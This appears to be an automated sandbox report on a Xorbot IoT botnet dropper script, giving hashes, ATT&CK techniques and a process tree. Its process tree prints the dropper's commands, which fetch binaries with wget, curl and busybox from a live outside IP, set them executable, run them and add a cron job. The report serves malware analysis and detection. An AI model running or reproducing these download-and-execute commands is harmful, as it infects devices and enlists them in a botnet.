xorbot | b0ce3fe8b6465a2323009d188a1d3081ce5a76ae93bf4a2809b9aae99ee2205a

Analysis

max time kernel
150s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
01-12-2024 00:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

29ec86d77f7675942f8a1012ba9709e4
SHA1

062170abb27a237f8468cd5d69fd32f736fc96fe
SHA256

b0ce3fe8b6465a2323009d188a1d3081ce5a76ae93bf4a2809b9aae99ee2205a
SHA512

e28daec2232ae26a0a3a74cee182927727360e36d90970457ae70679a88e74489ffd9532af8c5293b96b8e9999b5fec788508aa0ec69762a22bd7373068e7636
SSDEEP

192:1Iackckcuc9cBUY/u/xXfgbckckcuc9cBwEnH/T:1Ia/nv0wFW/xXfgb/nv0wfH/T

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral3/files/fstream-6.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmod

pid	Process
747	chmod
761	chmod

Executes dropped EXE 2 IoCs

Processes:

ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcPf8QgRGQhX81fBREjrxVScqa5LeDWidaAEk

ioc	pid	Process
/tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP	748	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
/tmp/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk	762	f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk

Renames itself 1 IoCs

Processes:

ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP

pid	Process
749	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.D1ntaJ	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP

description	ioc	Process
File opened for reading	/proc/799/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/842/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/926/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/10/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/78/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/824/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/893/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/908/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/144/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/521/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/927/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/881/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/898/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/20/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/901/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/4/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/16/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/874/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/880/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/919/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/353/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/831/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/861/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/870/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/907/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/712/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/859/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/719/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/104/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/15/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/821/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/749/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/936/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/850/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/324/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/708/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/77/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/837/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/853/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/912/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/37/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/827/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/884/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/8/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/760/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/886/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/930/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/76/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/885/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/921/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/871/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/890/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/780/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/882/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/6/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/398/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/114/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/922/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/923/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/11/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/856/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/894/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/707/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
File opened for reading	/proc/743/cmdline	ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxbusybox

description	ioc	Process
File opened for modification	/tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP	wget
File opened for modification	/tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP	curl
File opened for modification	/tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP	busybox
File opened for modification	/tmp/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:716
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:724
- /usr/bin/wget
  wget http://216.126.231.240/bins/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  - Writes file to tmp directory
  PID:726
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  - Writes file to tmp directory
  PID:746
- /bin/chmod
  chmod 777 ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  ./ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:748
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:750
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:751
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:752
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:757
- /bin/rm
  rm ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP
  2⤵
  PID:754
- /usr/bin/wget
  wget http://216.126.231.240/bins/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  PID:758
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  PID:759
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  - Writes file to tmp directory
  PID:760
- /bin/chmod
  chmod 777 f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  ./f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  - Executes dropped EXE
  PID:762
- /bin/rm
  rm f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk
  2⤵
  PID:764
- /usr/bin/wget
  wget http://216.126.231.240/bins/GxXWrTka3g0alBilJDr73X9CeNp7GeBsMh
  2⤵
  PID:765

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ch2dnBtp1raG1J0jDBRWvyiu4xEEK1aHcP

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit
/tmp/f8QgRGQhX81fBREjrxVScqa5LeDWidaAEk

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/var/spool/cron/crontabs/tmp.D1ntaJ

Filesize
210B

MD5
5bd6547e49afca1c381978d7ca0d71f4

SHA1
9285b09eb723747eb4d64f56ae1fd6156fc4e747

SHA256
1d7c97e9379e293d30a964f6e885a0ae5ad3a08c9de4e24946dbaabeef7f2342

SHA512
cf28018918868460ee62b32bb832e61797f3d124236b9ad469176db6ddbae7271067230ad12af2e0a431dd824ba5ba032c903118558f6edf22b93f090da70f08

Download Submit